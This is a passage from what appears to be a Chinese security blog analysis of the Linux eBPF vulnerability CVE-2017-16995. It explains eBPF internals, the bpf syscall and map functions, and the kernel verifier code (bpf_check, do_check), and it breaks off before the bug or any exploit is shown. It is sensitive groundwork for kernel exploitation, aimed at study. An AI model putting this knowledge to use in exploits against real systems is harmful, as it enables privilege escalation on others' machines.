BPF漏洞初识——cve-2017-16995详细分析-安全KER

Linux内核为了执行效率，损失了很多安全性。但是在用户空间很难触发内核代码，所以给内核漏洞利用造成了很大的困难。但是BPF使得用户空间拥有了与内核通信和数据共享的能力，所以成为了内核漏洞的高发区。本文以CVE-2017-16995漏洞初步学习了BPF漏洞的利用技巧。若有错误，敬请各位师傅斧正。

基础知识

eBPF简介

linux的用户层和内核层是隔离的，如果想让内核空间执行用户的代码，正常流程是编写内核模块。但是内核模块的编写执行需要有root权限，这对于攻击者是不理想的。而 BPF(Berkeley Packet Filter)则使普通用户拥有了让内核执行用户代码并共享数据的能力。用户可以将eBPF指令字节码传输给内核，然后通过socket写事件来触发内核执行代码。并且用户空间和内核空间会共享同一个map内存，且用户空间和内核空间都对其拥有读写能力。这就为攻击者提供了极大的便利。BPF发展经历了 2 个阶段，cBPF(classic BPF)和 eBPF(extend BPF)，cBPF已退出历史舞台，所以后文的BPF都指eBPF。

eBPF虚拟指令系统

eBPF虚拟指令系统属于 RISC，拥有 10 个虚拟寄存器， r0-r10在实际运行时，虚拟机会把这 10 个寄存器——对应于硬件 CPU的 10 个物理寄存器，以 x64为例，对应关系如下：

    R0 – rax
    R1 - rdi
    R2 - rsi
    R3 - rdx
    R4 - rcx
    R5 - r8
    R6 - rbx
    R7 - r13
    R8 - r14
    R9 - r15
    R10 – rbp（帧指针，frame pointer）

eBPF的指令格式如下：

struct bpf_insn {
    __u8    code;       /* opcode */
    __u8    dst_reg:4;  /* dest register */
    __u8    src_reg:4;  /* source register */
    __s16   off;        /* signed offset */
    __s32   imm;        /* signed immediate constant */
};

例如一条简单的x86指令mov edi 0xffffffff，其eBPF的指令结构如下：

#define BPF_MOV32_IMM(DST, IMM)                 \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_K,     \
        .dst_reg = DST,                 \
        .src_reg = 0,                   \
        .off   = 0,                 \
        .imm   = IMM })

所以，最后编写的格式如下BPF_MOV32_IMM(BPF_REG_1, 0xFFFFFFFF)，其字节码为：\xb4\x09\x00\x00\xff\xff\xff\xff。

BPF加载过程

一个 BPF的正常程序流程为：

用户程序调用 syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))申请创建一个 map，在 attr结构体中指定 map的类型、大小、最大容量等属性。之后调用 sys_bpf进而使用系统调用 syscall(__NR_bpf, BPF_MAP_CREATE, attr, size);创建一个 map数据结构，最终返回 map的文件描述符。这个文件是用户态和内核态共享的，因此后续内核态和用户态可以对这块共享内存进行读写：

//lib/bpf.c
int bpf_create_map(enum bpf_map_type map_type, 
int key_size,int value_size, int max_entries)
{
 union bpf_attr attr;

 memset(&attr, '\0', sizeof(attr));

 attr.map_type = map_type;
 attr.key_size = key_size;
 attr.value_size = value_size;
 attr.max_entries = max_entries;

 return sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}
//lib/bpf.c
static int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
        unsigned int size)
{
 return syscall(__NR_bpf, cmd, attr, size);
}
//bpf.h
union bpf_attr {
 struct { /* anonymous struct used by BPF_MAP_CREATE command */
     __u32   map_type;   /* one of enum bpf_map_type */
     __u32   key_size;   /* size of key in bytes */
     __u32   value_size; /* size of value in bytes */
     __u32   max_entries;    /* max number of entries in a map */
 };

 struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */
     __u32       map_fd;
     __aligned_u64   key;
     union {
         __aligned_u64 value;
         __aligned_u64 next_key;
     };
     __u64       flags;
 };

 struct { /* anonymous struct used by BPF_PROG_LOAD command */
     __u32       prog_type;  /* one of enum bpf_prog_type */
     __u32       insn_cnt;
     __aligned_u64   insns;
     __aligned_u64   license;
     __u32       log_level;  /* verbosity level of verifier */
     __u32       log_size;   /* size of user buffer */
     __aligned_u64   log_buf;    /* user supplied buffer */
     __u32       kern_version;   /* checked when prog_type=kprobe */
 };

 struct { /* anonymous struct used by BPF_OBJ_* commands */
     __aligned_u64   pathname;
     __u32       bpf_fd;
 };
} __attribute__((aligned(8)));
//bpf.h
/* BPF syscall commands, see bpf(2) man-page for details. */
enum bpf_cmd {
 BPF_MAP_CREATE,
 BPF_MAP_LOOKUP_ELEM,
 BPF_MAP_UPDATE_ELEM,
 BPF_MAP_DELETE_ELEM,
 BPF_MAP_GET_NEXT_KEY,
 BPF_PROG_LOAD,
 BPF_OBJ_PIN,
 BPF_OBJ_GET,
};

用户程序调用 syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))来将我们写的 BPF代码加载进内核，attr结构体中包含了指令数量、指令首地址、日志级别等属性。在加载之前会利用虚拟执行的方式来做安全行校验，这个校验包括对指定语法的检查、指令数量的检查、指令中的指针和立即数的范围及读写权限检查，禁止将内核中的地址暴露给用户空间，禁止对 BPF程序 stack之外的内核地址读写。安全校验通过后，程序被成功加载至内核，后续真正执行时，不再重复做检查；
用户程序通过调用 setsocopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd))将我们写的 BPF程序绑定到指定的 socket上，Progfd为上一步骤的返回值；
用户程序通过操作上一步骤中的 socket来触发 BPF真正执行。

eBPF代码执行过程

对 eBPF指令的解释执行，最后会进入 __bpf_prog_run函数。可以看到这里是根据指令，对寄存器进行了相应的操作。如果后续要分析 eBPF指令的执行过程，就需要对这个函数进行深入分析。(此处代码经过省略)，可以看到 __bpf_prog_run函数自己使用栈模拟了一个 ebpf程序的栈和寄存器。所以，ebpf程序的指令是能够直接控制内核栈数据，为后续漏洞利用提供了方便。

/**
 *    __bpf_prog_run - run eBPF program on a given context
 *    @ctx: is the data we are operating on
 *    @insn: is the array of eBPF instructions
 *
 * Decode and execute eBPF instructions.
 */
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
    u64 stack[MAX_BPF_STACK / sizeof(u64)];
    u64 regs[MAX_BPF_REG], tmp;
    static const void *jumptable[256] = {
        [0 ... 255] = &&default_label,
        /* Now overwrite non-defaults ... */
        /* 32 bit ALU operations */
        [BPF_ALU | BPF_ADD | BPF_X] = &&ALU_ADD_X,
        [BPF_ALU | BPF_ADD | BPF_K] = &&ALU_ADD_K,
        [BPF_ALU | BPF_SUB | BPF_X] = &&ALU_SUB_X,
        [BPF_ALU | BPF_SUB | BPF_K] = &&ALU_SUB_K,
        ...        //有省略
        [BPF_LD | BPF_ABS | BPF_B] = &&LD_ABS_B,
        [BPF_LD | BPF_IND | BPF_W] = &&LD_IND_W,
        [BPF_LD | BPF_IND | BPF_H] = &&LD_IND_H,
        [BPF_LD | BPF_IND | BPF_B] = &&LD_IND_B,
        [BPF_LD | BPF_IMM | BPF_DW] = &&LD_IMM_DW,
    };
    u32 tail_call_cnt = 0;
    void *ptr;
    int off;

#define CONT     ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

    FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
    ARG1 = (u64) (unsigned long) ctx;

    /* Registers used in classic BPF programs need to be reset first. */
    regs[BPF_REG_A] = 0;
    regs[BPF_REG_X] = 0;

select_insn:
    goto *jumptable[insn->code];

    /* ALU */
#define ALU(OPCODE, OP)            \
    ALU64_##OPCODE##_X:        \
        DST = DST OP SRC;    \
        CONT;            \
    ALU_##OPCODE##_X:        \
        DST = (u32) DST OP (u32) SRC;    \
        CONT;            \
    ALU64_##OPCODE##_K:        \
        DST = DST OP IMM;        \
        CONT;            \
    ALU_##OPCODE##_K:        \
        DST = (u32) DST OP (u32) IMM;    \
        CONT;

    ALU(ADD,  +)
    ALU(SUB,  -)
    ALU(AND,  &)
    ALU(OR,   |)
    ALU(LSH, <<)
    ALU(RSH, >>)
    ALU(XOR,  ^)
    ALU(MUL,  *)
#undef ALU
    ALU_NEG:
        DST = (u32) -DST;
        CONT;
    ALU64_NEG:
        DST = -DST;
        CONT;
    ALU_MOV_X:
        DST = (u32) SRC;
        CONT;
    ALU_MOV_K:
        DST = (u32) IMM;
        CONT;
    ALU64_MOV_X:
        DST = SRC;
        CONT;
    ALU64_MOV_K:
        DST = IMM;
        CONT;
    LD_IMM_DW:
        DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
        insn++;
        CONT;
        ...
    ALU_END_TO_BE:
        switch (IMM) {
        case 16:
            DST = (__force u16) cpu_to_be16(DST);
            break;
        case 32:
            DST = (__force u32) cpu_to_be32(DST);
            break;
        case 64:
            DST = (__force u64) cpu_to_be64(DST);
            break;
        }
        CONT;
    ALU_END_TO_LE:
        switch (IMM) {
        case 16:
            DST = (__force u16) cpu_to_le16(DST);
            break;
        case 32:
            DST = (__force u32) cpu_to_le32(DST);
            break;
        case 64:
            DST = (__force u64) cpu_to_le64(DST);
            break;
        }
        CONT;

    /* CALL */
    JMP_CALL:
        /* Function call scratches BPF_R1-BPF_R5 registers,
         * preserves BPF_R6-BPF_R9, and stores return value
         * into BPF_R0.
         */
        BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
                               BPF_R4, BPF_R5);
        CONT;

    JMP_TAIL_CALL: {
        struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
        struct bpf_array *array = container_of(map, struct bpf_array, map);
        struct bpf_prog *prog;
        u64 index = BPF_R3;

        if (unlikely(index >= array->map.max_entries))
            goto out;

        if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
            goto out;

        tail_call_cnt++;

        prog = READ_ONCE(array->ptrs[index]);
        if (unlikely(!prog))
            goto out;

        /* ARG1 at this point is guaranteed to point to CTX from
         * the verifier side due to the fact that the tail call is
         * handeled like a helper, that is, bpf_tail_call_proto,
         * where arg1_type is ARG_PTR_TO_CTX.
         */
        insn = prog->insnsi;
        goto select_insn;
out:
        CONT;
    }
    /* JMP */
    JMP_JA:
        insn += insn->off;
        CONT;
    JMP_JEQ_X:
        if (DST == SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JEQ_K:
        if (DST == IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JNE_X:
        if (DST != SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JNE_K:
        if (DST != IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
        ...

    /* STX and ST and LDX*/
#define LDST(SIZEOP, SIZE)                        \
    STX_MEM_##SIZEOP:                        \
        *(SIZE *)(unsigned long) (DST + insn->off) = SRC;    \
        CONT;                            \
    ST_MEM_##SIZEOP:                        \
        *(SIZE *)(unsigned long) (DST + insn->off) = IMM;    \
        CONT;                            \
    LDX_MEM_##SIZEOP:                        \
        DST = *(SIZE *)(unsigned long) (SRC + insn->off);    \
        CONT;

    LDST(B,   u8)
    LDST(H,  u16)
    LDST(W,  u32)
    LDST(DW, u64)
#undef LDST
    STX_XADD_W: /* lock xadd *(u32 *)(dst_reg + off16) += src_reg */
        atomic_add((u32) SRC, (atomic_t *)(unsigned long)
               (DST + insn->off));
        CONT;
    STX_XADD_DW: /* lock xadd *(u64 *)(dst_reg + off16) += src_reg */
        atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
                 (DST + insn->off));
        CONT;
    LD_ABS_W: /* BPF_R0 = ntohl(*(u32 *) (skb->data + imm32)) */
        off = IMM;
load_word:
        ...

    default_label:
        /* If we ever reach this, we have a bug somewhere. */
        WARN_RATELIMIT(1, "unknown opcode %02x\n", insn->code);
        return 0;
}

eBPF函数介绍

eBPF是通过执行不同的函数，来实现各种功能，参考手册在这。可以使用的函数如下：

//创建一个map内存，返回一个执行map的文件指针      
BPF_MAP_CREATE
              Create a map and return a file descriptor that refers to
              the map.  The close-on-exec file descriptor flag (see
              fcntl(2)) is automatically enabled for the new file
              descriptor.
//从map内存中根据传入的key值寻找到对应的value
BPF_MAP_LOOKUP_ELEM
              Look up an element by key in a specified map and return
              its value.
//创建或更新map内存中一个key值或value值
BPF_MAP_UPDATE_ELEM
              Create or update an element (key/value pair) in a
              specified map.
//删除map中的key值
BPF_MAP_DELETE_ELEM
              Look up and delete an element by key in a specified map.
//在map中根据key值查找，并返回下一个元素
BPF_MAP_GET_NEXT_KEY
              Look up an element by key in a specified map and return
              the key of the next element.
//验证和加载eBPF程序，然后一个新的文件描述符
BPF_PROG_LOAD
              Verify and load an eBPF program, returning a new file
              descriptor associated with the program.  The close-on-exec
              file descriptor flag (see fcntl(2)) is automatically
              enabled for the new file descriptor.

接下来，我们依次介绍各个函数的用法。

BPF_MAP_CREATE

该函数用于创建一个新的 map内存，返回一个新的文件描述符，并指向该内存。

int
bpf_create_map(enum bpf_map_type map_type,
unsigned int key_size,
unsigned int value_size,
unsigned int max_entries)
{
    union bpf_attr attr = {
        .map_type    = map_type,
        .key_size    = key_size,
        .value_size  = value_size,
        .max_entries = max_entries
    };

    return bpf(BPF_MAP_CREATE, &attr, sizeof(attr));c
}

首先将传入的四个参数，分别赋值给 bpf_attr数据结构，其原型如下，包含了使用 BPF函数时所需要的各个参数。

union bpf_attr {
    struct {    /* Used by BPF_MAP_CREATE */
        __u32         map_type;
        __u32         key_size;    /* size of key in bytes */
        __u32         value_size;  /* size of value in bytes */
        __u32         max_entries; /* maximum number of entries
                                                 in a map */
    };

    struct {    /* Used by BPF_MAP_*_ELEM and BPF_MAP_GET_NEXT_KEY
                              commands */
        __u32         map_fd;
        __aligned_u64 key;
        union {
            __aligned_u64 value;
            __aligned_u64 next_key;
        };
        __u64         flags;
    };

    struct {    /* Used by BPF_PROG_LOAD */
        __u32         prog_type;
        __u32         insn_cnt;
        __aligned_u64 insns;      /* 'const struct bpf_insn *' */
        __aligned_u64 license;    /* 'const char *' */
        __u32         log_level;  /* verbosity level of verifier */
        __u32         log_size;   /* size of user buffer */
        __aligned_u64 log_buf;    /* user supplied 'char *'
                                                buffer */
        __u32         kern_version;
        /* checked when prog_type=kprobe
                                                (since Linux 4.1) */
    };
} __attribute__((aligned(8)));

需要传入的4个参数，含义分别为：

bpf_map_type，指定创建的 map的类型，所有类型如下，用于指定建立映射的方式

enum bpf_map_type {
    BPF_MAP_TYPE_UNSPEC,
    BPF_MAP_TYPE_HASH,        //HASH表
    BPF_MAP_TYPE_ARRAY,        //数组
    BPF_MAP_TYPE_PROG_ARRAY,
    BPF_MAP_TYPE_PERF_EVENT_ARRAY,
    BPF_MAP_TYPE_PERCPU_HASH,
    BPF_MAP_TYPE_PERCPU_ARRAY,
    BPF_MAP_TYPE_STACK_TRACE,
    BPF_MAP_TYPE_CGROUP_ARRAY,
    BPF_MAP_TYPE_LRU_HASH,
    BPF_MAP_TYPE_LRU_PERCPU_HASH,
};

key_size指定了 key的数据大小，用于在后续验证 bpf程序时使用，防止越界访问。例如当一个 map创建的 key_size为8，那么此时如下函数将会被阻止。因为对于内核，其希望从源地址读取 8字节的数据，但是此时源地址为 fp-4，如果读取8字节，就会超出当前栈的边界，所以会被阻止

bpf_map_lookup_elem(map_fd, fp - 4)

同理，value_size指定了 value的数据大小。例如，当使用 value_size=1创建了 map之后，使用如下代码则会被阻止。因为，这里的 value大小为 1 字节，而却想要将其赋值为 4字节，超出了 value_size。

value = bpf_map_lookup_elem(...);
*(u32 *) value = 1;

max_entries指定了 map的大小

BPF_MAP_LOOKUP_ELEM

BPF_MAP_LOOKUP_ELEM函数根据传入的 key执行寻找其对应的元素。

int bpf_lookup_elem(int fd, const void *key, void *value)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key    = ptr_to_u64(key),
        .value  = ptr_to_u64(value),
    };

    return bpf(BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

如果一个元素被找到，则返回0，并将该值存入存入的value参数里，其指向了一个上一步提到的 value_size大小的 buffer。如果没有被找到，则返回 -1，并设置 errno。

BPF_MAP_UPDATE_ELEM

BPF_MAP_UPDATE_ELEM函数使用传入的 key或 value创建或者更新一个map中的元素

int bpf_update_elem(int fd, const void *key, const void *value,
                    uint64_t flags)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key    = ptr_to_u64(key),
        .value  = ptr_to_u64(value),
        .flags  = flags,
    };

    return bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

flag参数必须为如下选项，

BPF_ANY
    Create a new element or update an existing element.

BPF_NOEXIST
    Create a new element only if it did not exist.

BPF_EXIST
    Update an existing element.

如果成功，返回 0。若失败，则返回 -1。

BPF_MAP_DELETE_ELEM

BPF_MAP_DELETE_ELEM函数用于根据传入的 key或 value来删除一个元素：

int bpf_delete_elem(int fd, const void *key)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key    = ptr_to_u64(key),
    };

    return bpf(BPF_MAP_DELETE_ELEM, &attr, sizeof(attr));
}

如果成功，则返回 0。如果元素为被找到找到，则返回 -1。

BPF_MAP_GET_NEXT_KEY

该含糊根据传入的 key值寻找到对应的元素，然后返回其下一个元素：

int bpf_get_next_key(int fd, const void *key, void *next_key)
{
    union bpf_attr attr = {
        .map_fd   = fd,
        .key      = ptr_to_u64(key),
        .next_key = ptr_to_u64(next_key),
    };

    return bpf(BPF_MAP_GET_NEXT_KEY, &attr, sizeof(attr));
}

如果 key被找到，则返回0，并将 next_key指向 key值得下一个元素。如果key未找到，则返回 0，并将 next_key指向第一个元素。如果 key是最后一个元素，则返回 -1，并将 next_key设置为 ENOENT。

BPF_PROG_LOAD

该函数用于加载一个 eBPF程序到内核，返回一个新的指向 eBPF程序的文件指针。

char bpf_log_buf[LOG_BUF_SIZE];

int
    bpf_prog_load(enum bpf_prog_type type,
                  const struct bpf_insn *insns, int insn_cnt,
                  const char *license)
{
    union bpf_attr attr = {
        .prog_type = type,
        .insns     = ptr_to_u64(insns),
        .insn_cnt  = insn_cnt,
        .license   = ptr_to_u64(license),
        .log_buf   = ptr_to_u64(bpf_log_buf),
        .log_size  = LOG_BUF_SIZE,
        .log_level = 1,
    };

    return bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
}

map内存可以被 eBPF程序访问，并且实现从 eBPF程序和用户空间程序交互数据。例如，eBPF程序可以获取进程数据（例如kprobe、packets）并将数据存储到map，然后用户空间程序就可以通过访问 map来获取数据。反之亦然。

BPF的安全校验

这里我们分析一下 Verifier机制，主要检测函数为 bpf_check：

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
    char __user *log_ubuf = NULL;
    struct verifier_env *env;
    int ret = -EINVAL;
    //指令条数判断
    if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
        return -E2BIG;

    /* 'struct verifier_env' can be global, but since it's not small,
     * allocate/free it every time bpf_check() is called
     */
    //分配 verifier_env空间
    env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
    if (!env)
        return -ENOMEM;

    env->prog = *prog;

    /* grab the mutex to protect few globals used by verifier */
    mutex_lock(&bpf_verifier_lock);

    if (attr->log_level || attr->log_buf || attr->log_size) {
        /* user requested verbose verifier output
         * and supplied buffer to store the verification trace
         */
        log_level = attr->log_level;
        log_ubuf = (char __user *) (unsigned long) attr->log_buf;
        log_size = attr->log_size;
        log_len = 0;

        ret = -EINVAL;
        /* log_* values have to be sane */
        if (log_size < 128 || log_size > UINT_MAX >> 8 ||
            log_level == 0 || log_ubuf == NULL)
            goto free_env;

        ret = -ENOMEM;
        log_buf = vmalloc(log_size);
        if (!log_buf)
            goto free_env;
    } else {
        log_level = 0;
    }
    /* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers
 */
    //将伪指令中操作map_fd的部分替换成map地址，注意这个地址是8字节的，因此在实现中用本指令的imm和下一条指令的2个4字节中存储了这个地址
    /* store map pointer inside BPF_LD_IMM64 instruction 
            insn[0].imm = (u32) (unsigned long) map;
            insn[1].imm = ((u64) (unsigned long) map) >> 32;
    */
    //这个函数下面细讲
    ret = replace_map_fd_with_map_ptr(env);
    if (ret < 0)
        goto skip_full_check;

    env->explored_states = kcalloc(env->prog->len,
                       sizeof(struct verifier_state_list *),
                       GFP_USER);
    ret = -ENOMEM;
    if (!env->explored_states)
        goto skip_full_check;
    //控制流图检查死循环和不可能到达的跳转
    ret = check_cfg(env);
    if (ret < 0)
        goto skip_full_check;

    env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);
    //核心检查函数
    ret = do_check(env);

skip_full_check:
    while (pop_stack(env, NULL) >= 0);
    free_states(env);

    if (ret == 0)
        /* program is valid, convert *(u32*)(ctx + off) accesses */
        ret = convert_ctx_accesses(env);

    if (log_level && log_len >= log_size - 1) {
        BUG_ON(log_len >= log_size);
        /* verifier log exceeded user supplied buffer */
        ret = -ENOSPC;
        /* fall through to return what was recorded */
    }

    /* copy verifier log back to user space including trailing zero */
    if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
        ret = -EFAULT;
        goto free_log_buf;
    }

    if (ret == 0 && env->used_map_cnt) {
        /* if program passed verifier, update used_maps in bpf_prog_info */
        env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
                              sizeof(env->used_maps[0]),
                              GFP_KERNEL);

        if (!env->prog->aux->used_maps) {
            ret = -ENOMEM;
            goto free_log_buf;
        }

        memcpy(env->prog->aux->used_maps, env->used_maps,
               sizeof(env->used_maps[0]) * env->used_map_cnt);
        env->prog->aux->used_map_cnt = env->used_map_cnt;

        /* program is valid. Convert pseudo bpf_ld_imm64 into generic
         * bpf_ld_imm64 instructions
         */
        convert_pseudo_ld_imm64(env);
    }

free_log_buf:
    if (log_level)
        vfree(log_buf);
free_env:
    if (!env->prog->aux->used_maps)
        /* if we didn't copy map pointers into bpf_prog_info, release
         * them now. Otherwise free_bpf_prog_info() will release them.
         */
        release_maps(env);
    *prog = env->prog;
    kfree(env);
    mutex_unlock(&bpf_verifier_lock);
    return ret;
}

其中主要是使用 do_check来根据不同的指令类型来做具体的合法性判断。使用的核心数据结构是 reg_state，bpf_reg_type枚举变量用来表示寄存器的类型，初始化为 NOT_INIT：

struct reg_state {
    enum bpf_reg_type type;
    union {
        /* valid when type == CONST_IMM | PTR_TO_STACK */
        int imm;

        /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
         *   PTR_TO_MAP_VALUE_OR_NULL
         */
        struct bpf_map *map_ptr;
    };
};
static void init_reg_state(struct reg_state *regs)
{
    int i;

    for (i = 0; i < MAX_BPF_REG; i++) {
        regs[i].type = NOT_INIT;
        regs[i].imm = 0;
        regs[i].map_ptr = NULL;
    }

    /* frame pointer */
    regs[BPF_REG_FP].type = FRAME_PTR;

    /* 1st arg to a function */
    regs[BPF_REG_1].type = PTR_TO_CTX;
}
/* types of values stored in eBPF registers */
enum bpf_reg_type {
    NOT_INIT = 0,        /* nothing was written into register */
    UNKNOWN_VALUE,       /* reg doesn't contain a valid pointer */
    PTR_TO_CTX,      /* reg points to bpf_context */
    CONST_PTR_TO_MAP,    /* reg points to struct bpf_map */
    PTR_TO_MAP_VALUE,    /* reg points to map element value */
    PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
    FRAME_PTR,       /* reg == frame_pointer */
    PTR_TO_STACK,        /* reg == frame_pointer + imm */
    CONST_IMM,       /* constant integer value */
};

do_check

static int do_check(struct verifier_env *env)
{
    struct verifier_state *state = &env->cur_state;
    struct bpf_insn *insns = env->prog->insnsi;
    struct reg_state *regs = state->regs;
    int insn_cnt = env->prog->len;
    int insn_idx, prev_insn_idx = 0;
    int insn_processed = 0;
    bool do_print_state = false;

    init_reg_state(regs);
    insn_idx = 0;
    for (;;) {
        struct bpf_insn *insn;
        u8 class;
        int err;
        //指令条数检查
        if (insn_idx >= insn_cnt) {
            verbose("invalid insn idx %d insn_cnt %d\n",
                insn_idx, insn_cnt);
            return -EFAULT;
        }

        insn = &insns[insn_idx];
        class = BPF_CLASS(insn->code);
        //运行过的次数上限检查
        if (++insn_processed > 32768) {
            verbose("BPF program is too large. Proccessed %d insn\n",
                insn_processed);
            return -E2BIG;
        }
        //检测该指令有无visit，主要通过env->explored_states的状态数组保存访问过的指令的状态
        err = is_state_visited(env, insn_idx);
        if (err < 0)
            return err;
        if (err == 1) {
            /* found equivalent state, can prune the search */
            if (log_level) {
                if (do_print_state)
                    verbose("\nfrom %d to %d: safe\n",
                        prev_insn_idx, insn_idx);
                else
                    verbose("%d: safe\n", insn_idx);
            }
            goto process_bpf_exit;
        }

        if (log_level && do_print_state) {
            verbose("\nfrom %d to %d:", prev_insn_idx, insn_idx);
            print_verifier_state(env);
            do_print_state = false;
        }

        if (log_level) {
            verbose("%d: ", insn_idx);
            print_bpf_insn(env, insn);
        }
        //计算指令ALU
        if (class == BPF_ALU || class == BPF_ALU64) {
            //检查具体指令的合法性，比如是否使用了保留的field，使用的寄存器编号是否超过了模拟寄存器的最大编号，寄存器是否可读/写，寄存器值是否是指针等，该函数后面详细解释
            err = check_alu_op(env, insn);
            if (err)
                return err;
        //BPF_LDX指令
        } else if (class == BPF_LDX) {
            enum bpf_reg_type src_reg_type;

            /* check for reserved fields is already done */

            /* check src operand */
            //检测源寄存器的编号是否超过最大编号，如果为操作数其是否初始化，是否是指针
            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
            //检查目的寄存器
            err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
            if (err)
                return err;
            //
            src_reg_type = regs[insn->src_reg].type;

            /* check that memory (src_reg + off) is readable,
             * the state of dst_reg will be updated by this func
             */
            //检查源寄存器+off所指的地址是可读的
            err = check_mem_access(env, insn->src_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_READ,
                           insn->dst_reg);
            if (err)
                return err;

            if (BPF_SIZE(insn->code) != BPF_W) {
                insn_idx++;
                continue;
            }

            if (insn->imm == 0) {
                /* saw a valid insn
                 * dst_reg = *(u32 *)(src_reg + off)
                 * use reserved 'imm' field to mark this insn
                 */
                insn->imm = src_reg_type;//判断出了一种指令类型，即地址取值指令

            }
            //源类型非立即数
            else if (src_reg_type != insn->imm &&
                   (src_reg_type == PTR_TO_CTX ||
                    insn->imm == PTR_TO_CTX)) {
                /* ABuser program is trying to use the same insn
                 * dst_reg = *(u32*) (src_reg + off)
                 * with different pointer types:
                 * src_reg == ctx in one branch and
                 * src_reg == stack|map in some other branch.
                 * Reject it.
                 */
                verbose("same insn cannot be used with different pointers\n");
                return -EINVAL;
            }
        //BPF_STX指令
        } else if (class == BPF_STX) {
            enum bpf_reg_type dst_reg_type;

            if (BPF_MODE(insn->code) == BPF_XADD) {
                err = check_xadd(env, insn);
                if (err)
                    return err;
                insn_idx++;
                continue;
            }

            /* check src1 operand */
            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
            /* check src2 operand */
            err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
            if (err)
                return err;

            dst_reg_type = regs[insn->dst_reg].type;

            /* check that memory (dst_reg + off) is writeable */
            err = check_mem_access(env, insn->dst_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_WRITE,
                           insn->src_reg);
            if (err)
                return err;

            if (insn->imm == 0) {
                insn->imm = dst_reg_type;
            } else if (dst_reg_type != insn->imm &&
                   (dst_reg_type == PTR_TO_CTX ||
                    insn->imm == PTR_TO_CTX)) {
                verbose("same insn cannot be used with different pointers\n");
                return -EINVAL;
            }
        //BPF_ST指令
        } else if (class == BPF_ST) {
            if (BPF_MODE(insn->code) != BPF_MEM ||
                insn->src_reg != BPF_REG_0) {
                verbose("BPF_ST uses reserved fields\n");
                return -EINVAL;
            }
            /* check src operand */
            err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
            if (err)
                return err;

            /* check that memory (dst_reg + off) is writeable */
            err = check_mem_access(env, insn->dst_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_WRITE,
                           -1);
            if (err)
                return err;
        //BPF_JMP指令
        } else if (class == BPF_JMP) {
            u8 opcode = BPF_OP(insn->code);
            //直接跳转CALL
            if (opcode == BPF_CALL) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->off != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_CALL uses reserved fields\n");
                    return -EINVAL;
                }
                //在这个函数中会检查跳转的地址有无超过范围，函数的五个参数的参数类型(是否是key/value/map地址/stack_size等)，更新返回值寄存器，更新reg_state等。
                err = check_call(env, insn->imm);
                if (err)
                    return err;

            } else if (opcode == BPF_JA) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->imm != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_JA uses reserved fields\n");
                    return -EINVAL;
                }

                insn_idx += insn->off + 1;
                continue;

            } else if (opcode == BPF_EXIT) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->imm != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_EXIT uses reserved fields\n");
                    return -EINVAL;
                }
                //r0保存返回值，bpf_exit为指令集合结束标志，在此之前检查有无写入值
                /* eBPF calling convetion is such that R0 is used
                 * to return the value from eBPF program.
                 * Make sure that it's readable at this time
                 * of bpf_exit, which means that program wrote
                 * something into it earlier
                 */
                err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
                if (err)
                    return err;

                if (is_pointer_value(env, BPF_REG_0)) {
                    verbose("R0 leaks addr as return value\n");
                    return -EACCES;
                }
                //遇到一个exit就结束一个分支，回退到分叉处执行另一个branch，类似于走迷宫遍历路径
process_bpf_exit:
                insn_idx = pop_stack(env, &prev_insn_idx);
                if (insn_idx < 0) {
                    break;
                } else {
                    do_print_state = true;
                    continue;
                }
            } else {
                err = check_cond_jmp_op(env, insn, &insn_idx);
                if (err)
                    return err;
            }
        } else if (class == BPF_LD) {
